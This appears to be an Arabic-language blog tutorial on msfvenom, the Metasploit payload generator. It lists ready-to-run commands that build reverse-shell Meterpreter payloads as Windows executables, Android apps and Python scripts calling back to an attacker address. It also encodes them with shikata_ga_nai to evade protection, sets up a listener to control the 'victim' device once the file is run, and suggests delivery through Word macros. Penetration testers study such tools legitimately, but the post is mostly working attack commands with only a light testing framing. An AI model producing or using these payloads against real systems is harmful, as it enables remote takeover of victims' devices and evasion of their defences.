Blog Wallpaper
A
ALI ALAKABRالسبت، 28 يونيو 2025

msfvenom

هي جزء من إطار Metasploit، وتُستخدم لإنشاء حمولة (Payload) خبيثة يمكن حقنها في ملفات أو تطبيقات بهدف اختبار الحماية (أو تنفيذ هجوم موجه في بيئة اختبارية).

منذ شهرين تقريبا

Area Iconالأمن السيبراني - إختبار الإختراق6.4.64 النسخة

ماهي msfvenom؟

أداة msfvenom هي دمج بين أداتين قديمات كانوا موجودات بمشروع Metasploit:

  • msfpayload: كانت مسؤولة عن توليد الـ payloads.
  • msfencode: كانت مسؤولة عن تشفير الـ payloads حتى تتجاوز برامج الحماية.

من اندمجن صار عدنا msfvenom، واللي تكدر تولد بيها بايلودات (payloads) بأشكال متعددة (مثل EXE, APK, DLL, وغيرها)، وتحدد نوع الاتصال (reverse, bind)، وتضيف إعداداتك الخاصة، مثل الـ IP والبورت.


شنو تحتاج حتى تستخدم msfvenom؟

  • النظام: تشتغل على Linux وWindows
  • لازم يكون منصب عندك Metasploit Framework، لأن الأداة جزء من عنده.

طريقة التثبيت:

sudo apt update && sudo apt install metasploit-framework

وتتأكد من تنصيبها بـ:

msfvenom --help
تشغيل الأداة
تشغيل الأداة

طريقة الأستخدام:

msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output_file>

-p: تحدد نوع البايلود

LHOST/LPORT: تحدد عنوانك (IP) والبورت اللي راح تتصل عليه الضحية

-f: تحدد نوع الملف (مثل exe, apk, etc)

-o: تحدد اسم الملف الناتج


أمثلة:

توليد بايلود EXE :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o hack.exe
  • windows/meterpreter/reverse_tcp: هذا البايلود يفتح اتصال عكسي من جهاز الضحية الك.
  • LHOST: هو الآي بي الخاص بيك (ممكن تحصل عليه بـ ifconfig).
  • LPORT: البورت اللي راح تستمع عليه.
  • -f exe: توليد ملف exe.
  • -o hack.exe: اسم الملف النهائي.

توليد بايلود APK

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -o evil.apk

تشفير البايلود (لتخطي الـWAF)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o enc.exe
  • -e x86/shikata_ga_nai: نوع التشفير.
  • -i 3: عدد مرات التشفير.

أنواع البايلودات المتوفرة:

msfvenom -l payloads

راح تشوف أنواع هواي:

  • windows/meterpreter/...
  • linux/x86/shell/...
  • android/meterpreter/...
  • php/meterpreter/...
  • python/meterpreter/...
  • وحتى للماك: osx/x86/shell_reverse_tcp

تنسيقات الملفات - Formats

تحددها بـ -f، مثل:

التنسيقالوصف
exeملف ويندوز تنفيذي
elfملف تنفيذي للينكس
apkتطبيق أندرويد
rawكود خام
c, python, bashتوليد كود بلغة معينة
asp, php, jspبايلود للويب

مثال توليد بايلود بلغة Python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell.py

استخدام البايلود:

تحتاج تفتح listener بجهازك حتى تستقبل الاتصال. افتح Metasploit بهالشكل:

msfconsole

وبعدين:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

وبس ينفذ الضحية الملف، راح ينفتح عندك جلسة Meterpreter تتحكم بيها بالجهاز.


اشياء ممكن تسويها بالبايلودات:

المهمةالبايلود
التحكم الكاملmeterpreter
فتح شل بسيطshell_reverse_tcp
بايلودات بدون اتصال مباشرstageless payloads
إدخال البايلود Wordاستخدم macro + msfvenom raw